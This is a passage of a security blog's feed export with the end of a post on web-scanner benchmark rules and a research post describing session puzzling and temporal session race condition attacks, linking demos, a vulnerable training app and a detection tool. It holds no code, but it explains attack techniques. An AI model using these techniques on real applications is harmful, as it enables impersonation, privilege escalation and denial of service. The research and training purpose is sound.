&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;That&#39;s obviously great news for me (and for anyone else using the project or the benchmark results – credits to &lt;b&gt;Simon Bennetts&lt;/b&gt; and &lt;b&gt;Axel Neumann&lt;/b&gt;), since the ZAP-WAVE project already contains test cases in several exposures that are not covered by WAVSEP, and any additional contribution will only enhance my current efforts (I&#39;m currently working on dozens of additional test cases for new exposure categories).&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;I have already started to adjust these test cases (changes and integration notes will appear in the changelog), and I hope I&#39;ll manage to release them soon.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;&lt;u&gt;Now for several announcements that are related to the upcoming benchmark and the future versions of WAVSEP:&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;After the last benchmark was published, I got a lot of feedback, requests, interesting ideas and various suggestions. I read it all, and some of the requests and suggestions will be implemented in the upcoming benchmark and the future versions of WAVSEP.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;The different feedbacks lead me to some important realizations:&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;direction: ltr; margin-bottom: 10.0pt; margin-left: 36.0pt; margin-right: 0cm; margin-top: 0cm; mso-add-space: auto; mso-list: l1 level1 lfo1; text-align: left; text-indent: -18.0pt; unicode-bidi: embed;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;The rules of the test &lt;b&gt;must&lt;/b&gt; be made &lt;b&gt;public and clear&lt;/b&gt; to all vendors, in order to make sure that the process will be fair. In order to achieve this goal, certain changes must be implemented in the testing process.&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;direction: ltr; margin-bottom: 10.0pt; margin-left: 36.0pt; margin-right: 0cm; margin-top: 0cm; mso-add-space: auto; mso-list: l1 level1 lfo1; text-align: left; text-indent: -18.0pt; unicode-bidi: embed;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;In order to enable vendors to show improvement &lt;b&gt;quickly&lt;/b&gt; and in order to prevent any previous &quot;negative&quot; results from being perceived as a long term &quot;punishment&quot;, the result presentation method must be updated more frequently, even between benchmarks.&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;direction: ltr; margin-bottom: 10.0pt; margin-left: 36.0pt; margin-right: 0cm; margin-top: 0cm; mso-add-space: auto; mso-list: l1 level1 lfo1; text-align: left; text-indent: -18.0pt; unicode-bidi: embed;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;As a result, I have constructed the following set of rules which will govern the testing processes in any future benchmark I will perform, and also require some changes in the publication cycles of WAVSEP:&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;direction: ltr; margin-bottom: 10.0pt; margin-left: 36.0pt; margin-right: 0cm; margin-top: 0cm; mso-add-space: auto; mso-list: l0 level1 lfo2; text-align: left; text-indent: -18.0pt; unicode-bidi: embed;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;In order to enable vendors to show &lt;b&gt;&lt;u&gt;improvement&lt;/u&gt;&lt;/b&gt;, all the future benchmarks will be &lt;b&gt;based&lt;/b&gt; on the &lt;b&gt;WAVSEP test cases&lt;/b&gt; used in the &lt;u&gt;previous&lt;/u&gt; benchmark, &lt;b&gt;in addition&lt;/b&gt; to any other tests (interpretation: the upcoming benchmark will &lt;b&gt;also&lt;/b&gt; include tests against all the SQLi and RXSS test cases of WAVSEP 1.0.3).&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;direction: ltr; margin-bottom: 10.0pt; margin-left: 36.0pt; margin-right: 0cm; margin-top: 0cm; mso-add-space: auto; mso-list: l0 level1 lfo2; text-align: left; text-indent: -18.0pt; unicode-bidi: embed;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;Since a benchmark is much more interesting if the content in it is new, each &lt;b&gt;major&lt;/b&gt; benchmark will include different test aspects and / or detection results for test cases in additional exposure categories.&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;direction: ltr; margin-bottom: 10.0pt; margin-left: 36.0pt; margin-right: 0cm; margin-top: 0cm; mso-add-space: auto; mso-list: l0 level1 lfo2; text-align: left; text-indent: -18.0pt; unicode-bidi: embed;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;In order for the contest to be even more interesting (and in order to prevent one vendor from preparing for &lt;b&gt;everything&lt;/b&gt; while another was not even notified, was not aware of the WAVSEP platform, has insufficient time to improve the tool prior to the benchmark, etc), &lt;b&gt;the test cases of&amp;nbsp;&lt;u&gt;some&lt;/u&gt;&lt;/b&gt; &lt;b&gt;of the&lt;/b&gt; &lt;b&gt;new exposure categories&lt;/b&gt; will only be published &lt;b&gt;&lt;u&gt;after&lt;/u&gt;&lt;/b&gt; the first major benchmark that included tests against them – something that will &lt;b&gt;add some spice&lt;/b&gt; to the results, make sure the process will be fair, but will still &lt;b&gt;enable vendors to improve their previous score&lt;/b&gt;.&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;direction: ltr; margin-bottom: 10.0pt; margin-left: 36.0pt; margin-right: 0cm; margin-top: 0cm; mso-add-space: auto; mso-list: l0 level1 lfo2; text-align: left; text-indent: -18.0pt; unicode-bidi: embed;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;The upcoming benchmark will include tests in some new categories: I&#39;m currently aiming for at least 3 &lt;b&gt;&lt;u&gt;additional&lt;/u&gt;&lt;/b&gt; categories, in addition to the previous (and I hope that I&#39;ll manage to finish all the developments and tests before my next deadline… at least for most tools).&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;direction: ltr; margin-bottom: 10.0pt; margin-left: 36.0pt; margin-right: 0cm; margin-top: 0cm; mso-add-space: auto; mso-list: l0 level1 lfo2; text-align: left; text-indent: -18.0pt; unicode-bidi: embed;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;Vendors that wish to update their score will be given an opportunity to do so, &lt;b&gt;even between major benchmarks&lt;/b&gt;, by using a presentation method that will support dynamically updated content. The terms for these tests will be published separately, as soon as the presentation framework will be available (soon). &lt;b&gt;Re-tests&lt;/b&gt; of additional versions of the same product will be performed under these terms.&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;direction: ltr; margin-bottom: 10.0pt; margin-left: 36.0pt; margin-right: 0cm; margin-top: 0cm; mso-add-space: auto; mso-list: l0 level1 lfo2; text-align: left; text-indent: -18.0pt; unicode-bidi: embed;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;Since my&lt;b&gt;&lt;u&gt; final goal&lt;/u&gt;&lt;/b&gt;&amp;nbsp;is to test&amp;nbsp;&lt;b&gt;&lt;u&gt;all the vendors&lt;/u&gt;&lt;/b&gt; (almost 100), test additional types of scanning services / products, and eventually, test as many features of these tools as I possibly can, my time is a valuable asset, and contacting commercial vendors that don&#39;t offer a publically available evaluation version is very difficult. Although I will try my best to go through official channels and perform all the tests myself (or through members of the WAVSEP project)&lt;b&gt;, &lt;/b&gt;my experience shows that in some cases, the&lt;b&gt; &lt;/b&gt;official channels might be time consuming, and sadly, sometimes more then I can afford. &amp;nbsp;Therefore,&lt;b&gt;&lt;u&gt; I encourage vendors to contact me directly, starting of&amp;nbsp;November 15, so I could test them properly, on equal terms&lt;/u&gt;&lt;/b&gt;. &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;&lt;b&gt;&lt;u&gt;Summary:&lt;/u&gt;&lt;/b&gt; future benchmarks will include test cases used in previous benchmarks (&lt;b&gt;to enable vendors to show improvement&lt;/b&gt;), new test cases which will only be published &lt;b&gt;after&lt;/b&gt; the benchmark (&lt;b&gt;so that the tests will be fair and the content more interesting&lt;/b&gt;), and finally -&amp;nbsp; the results will be more dynamic, to disable one more participation barrier.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;As I said in my previous posts - I&#39;m planning to continue to perform these comparisons for a long time, and intend &lt;b&gt;&lt;u&gt;to make sure&lt;/u&gt;&lt;/b&gt; that the community and vendors will both be able benefit from this initiative, if they only choose to.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;Cheers&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sectooladdict.blogspot.com/feeds/1447893863240812862/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://sectooladdict.blogspot.com/2011/10/rules-of-game-scanner-benchmarks.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/1447893863240812862'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/1447893863240812862'/><link rel='alternate' type='text/html' href='http://sectooladdict.blogspot.com/2011/10/rules-of-game-scanner-benchmarks.html' title='Rules of the Game – Scanner Benchmarks'/><author><name>Shay Chen</name><uri>http://www.blogger.com/profile/16490521389991462247</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC9QLJKh4Z6I4puwxVoOzyuqVc4ZRYmL_XcS3dLCeIsRcdoEmwnZQejnW8__iitHgbTYcmCefW7UEtQPpZdbtqX0cnPCYn7Ws913obv19u44x89xHY8a-9JqfkdxyBXg/s220/n847114298_305931_3159.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3792178847867987053.post-2170804124815520540</id><published>2011-09-18T08:54:00.000-07:00</published><updated>2011-09-19T03:12:51.019-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="ADoS"/><category scheme="http://www.blogger.com/atom/ns#" term="Session Puzzling"/><category scheme="http://www.blogger.com/atom/ns#" term="Temporal Session Race Conditions"/><title type='text'>Session Puzzling and Session Race Conditions</title><content type='html'>&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;br /&gt;
&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: center; unicode-bidi: embed;&quot;&gt;&lt;b&gt;&lt;b&gt;&lt;span style=&quot;font-family: Calibri, sans-serif; font-size: 18pt; line-height: 115%;&quot;&gt;Is It Really That Complicated?&lt;/span&gt;&lt;/b&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;br /&gt;
&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;&lt;b&gt;&lt;u&gt;Session Puzzling – An Indirect Application Attack Vector – Now Simplified&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;u&gt;&lt;br /&gt;
&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;A couple of months ago, I published a paper on an&amp;nbsp;&lt;b&gt;under-emphasized application level attack vector&lt;/b&gt; nicknamed &quot;&lt;b&gt;&lt;i&gt;Session Puzzling&lt;/i&gt;&lt;/b&gt;&quot; – an attack pattern that can abuse improper usage of session variables (a.k.a &quot;&lt;b&gt;&lt;i&gt;Session Puzzles&lt;/i&gt;&lt;/b&gt;&quot;) in order to impersonate users, elevate privileges, bypass security restrictions and even execute &quot;traditional&quot; attack vectors against applications, &lt;b&gt;while bypassing any existing security mechanisms by attacking the application using a trusted input source&lt;/b&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;Even though the paper was published alongside a training kit&lt;b&gt; &lt;/b&gt;that was meant to demonstrate the various attack vectors (a vulnerable application called &quot;&lt;b&gt;&lt;i&gt;puzzlemall&lt;/i&gt;&quot;&lt;/b&gt;), the vast majority of responses I got have made me realize that most of the 2000 security professionals that were exposed to this attack &lt;b&gt;did not manage to understand it.&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;Some of the responses associated the paper to unrelated attacks, some didn&#39;t understand the impact or the mechanics, and some responses even claimed that the attacks &lt;b&gt;is too complicated to perform (!?!)&lt;/b&gt;. &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;Although I know that the attack is not simple, and that several session puzzling vectors require 10+ requests, I &lt;b&gt;refuse&lt;/b&gt; to believe it&#39;s that complicated.&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;Over the last couple of years, I have seen &lt;b&gt;many &lt;/b&gt;commercial&lt;b&gt; &lt;/b&gt;applications that were &lt;b&gt;vulnerable&lt;/b&gt; to this attack (Oracle E-Business Suite Included), so I&#39;m giving it one more shot before I&#39;ll let the attack fall into the &quot;&lt;b&gt;too complicated to explain&lt;/b&gt;&quot; category, and keep it all to myself.&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;The original whitepaper/presentation can be downloaded from the following addresses (contains background, additional attack vectors and mitigations):&lt;br /&gt;
&lt;a href=&quot;http://puzzlemall.googlecode.com/files/Session%20Puzzles%20-%20Indirect%20Application%20Attack%20Vectors%20-%20May%202011%20-%20Whitepaper.pdf&quot;&gt;&lt;b&gt;Whitepaper&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
&lt;b&gt;&lt;a href=&quot;http://puzzlemall.googlecode.com/files/Session%20Puzzles%20-%20Indirect%20Application%20Attack%20Vectors%20-%2017%20May%202011%20-%20Presentation.pptx&quot;&gt;Presentation&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;&lt;br /&gt;
The project homepage:&lt;br /&gt;
&lt;a href=&quot;http://puzzlemall.googlecode.com/&quot;&gt;http://puzzlemall.googlecode.com/&amp;nbsp;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;&lt;b&gt;The following &lt;u&gt;short&lt;/u&gt; movies demonstrate a few simple session puzzling sequences:&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;Authentication Bypass via Session Puzzling (Abusing common session variables):&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;&lt;a href=&quot;http://www.youtube.com/watch?v=-DackF8HsIE&quot;&gt;http://www.youtube.com/watch?v=-DackF8HsIE&lt;/a&gt; &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;User Impersonation via Session Puzzling (Abusing common session variables):&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;&lt;a href=&quot;http://www.youtube.com/watch?v=ikIyInm0wAg&quot;&gt;http://www.youtube.com/watch?v=ikIyInm0wAg&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;Session Puzzling via Redirection Prevention (Abusing Premature Session Population):&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;&lt;a href=&quot;http://www.youtube.com/watch?v=iTcOooHbgog&quot;&gt;http://www.youtube.com/watch?v=iTcOooHbgog&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;Bypassing Restrictions in Multiphase Processes via Session Puzzling (Abusing Common Session Flags)&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;&lt;a href=&quot;http://www.youtube.com/watch?v=HeP54b52IeQ&quot;&gt;http://www.youtube.com/watch?v=HeP54b52IeQ&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;The following POC movie demonstrates the attack against Oracle E-Business Suite (&lt;b&gt;exception scenario -&lt;/b&gt;&amp;nbsp;&lt;b&gt;not relying on input&lt;/b&gt;):&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;&lt;a href=&quot;http://www.hacktics.com/content/advisories/AdvORA20091214.html&quot;&gt;http://www.hacktics.com/content/advisories/AdvORA20091214.html&lt;/a&gt; &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;The training kit can be downloaded from the following address:&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;&lt;a href=&quot;http://puzzlemall.googlecode.com/files/puzzlemall.war&quot;&gt;http://puzzlemall.googlecode.com/files/puzzlemall.war&lt;/a&gt; (derby version)&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;&lt;b&gt;&lt;u&gt;Temporal Session Race Conditions and Layer Targeted ADoS&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;u&gt;&lt;br /&gt;
&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;Although the original attack relied on the existence of persistent session values, an extended attack was presented last week (15&lt;sup&gt;th&lt;/sup&gt; of September), in a local OWASP chapter meeting. &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;The extended method (nicknamed &quot;&lt;b&gt;Temporal Session Race Conditions&lt;/b&gt;&quot;) enables detecting &amp;amp; exploiting session puzzles even if the session variables have a lifespan of milliseconds (session-level race conditions), by increasing the latency of certain lines of code through the use of layer targeted denial of service attacks.&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;The original OWASP presentation:&lt;br /&gt;
&lt;b&gt;&lt;a href=&quot;http://puzzlemall.googlecode.com/files/Temporal%20Session%20Race%20Conditions%20%28TSRC%29%20-%20Sept%202011%20-%20Presentation.pptx&quot;&gt;Presentation&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;&lt;b&gt;The following movies demonstrate a few simple TSRC attacks:&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;Exploiting Temporal Session Race Conditions via Connection Pool Consumption:&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;&lt;a href=&quot;http://www.youtube.com/watch?v=woWECWwrsSk&quot;&gt;http://www.youtube.com/watch?v=woWECWwrsSk&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;Exploiting Temporal Session Race Conditions via RegEx DoS:&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;&lt;a href=&quot;http://www.youtube.com/watch?v=3k_eJ1bcCro&quot;&gt;http://www.youtube.com/watch?v=3k_eJ1bcCro&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;An extended version of &quot;puzzlemall&quot; which includes TSRC vulnerabilities (premium login page, requires MySQL):&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;&lt;a href=&quot;http://puzzlemall.googlecode.com/files/puzzlemall-v.1.1.2-mysql.zip&quot;&gt;http://puzzlemall.googlecode.com/files/puzzlemall-v.1.1.2-mysql.zip&lt;/a&gt; &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;A simple tool that can assist in the detection of TSRC connection pool consumption scenarios:&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;&lt;a href=&quot;http://puzzlemall.googlecode.com/files/SessionKeepAlive.exe&quot;&gt;http://puzzlemall.googlecode.com/files/SessionKeepAlive.exe&lt;/a&gt; &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;&lt;b&gt;&lt;u&gt;Acknowledgements&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;The following individuals contributed to the Session Puzzling / TSRC research in various ways, and helped me turn a bunch of ideas into a consistent methodology:&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;Oren Ofer, Oren Hafif, Alex Ganelis, Liran Sheinbox and Zafrir Grossman.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;u&gt;Additional Resources&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
An attack similar to session puzzling is mentioned under the name &quot;&lt;a href=&quot;http://en.wikipedia.org/wiki/Session_poisoning&quot;&gt;session poisoning&lt;/a&gt;&quot;, but the session puzzling/TSRC sequences differ from this attack mainly by the &lt;b&gt;lack of direct input dependency&lt;/b&gt; (see the multiphase restriction bypass scenario and the e-business suite exploit for the exception scenario), and expand the attack&amp;nbsp;tool-set&amp;nbsp;in the aspect of &lt;b&gt;methodology&lt;/b&gt;, &lt;b&gt;predefined sequences&lt;/b&gt;,&amp;nbsp;&lt;b&gt;scope of modules&lt;/b&gt;, &lt;b&gt;complementary methods&lt;/b&gt; and usage of &lt;b&gt;denial of service&lt;/b&gt; for &lt;b&gt;extending the lifespan&lt;/b&gt; of temporary session variables.&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sectooladdict.blogspot.com/feeds/2170804124815520540/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://sectooladdict.blogspot.com/2011/09/session-puzzling-and-session-race.html#comment-form' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/2170804124815520540'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/2170804124815520540'/><link rel='alternate' type='text/html' href='http://sectooladdict.blogspot.com/2011/09/session-puzzling-and-session-race.html' title='Session Puzzling and Session Race Conditions'/><author><name>Shay Chen</name><uri>http://www.blogger.com/profile/16490521389991462247</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC9QLJKh4Z6I4puwxVoOzyuqVc4ZRYmL_XcS3dLCeIsRcdoEmwnZQejnW8__iitHgbTYcmCefW7UEtQPpZdbtqX0cnPCYn7Ws913obv19u44x89xHY8a-9JqfkdxyBXg/s220/n847114298_305931_3159.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3792178847867987053.post-5660944376278622097</id><published>2011-08-01T20:48:00.000-07:00</published><updated>2011-08-14T14:16:14.153-07:00</updated><title type='text'>Commercial Web 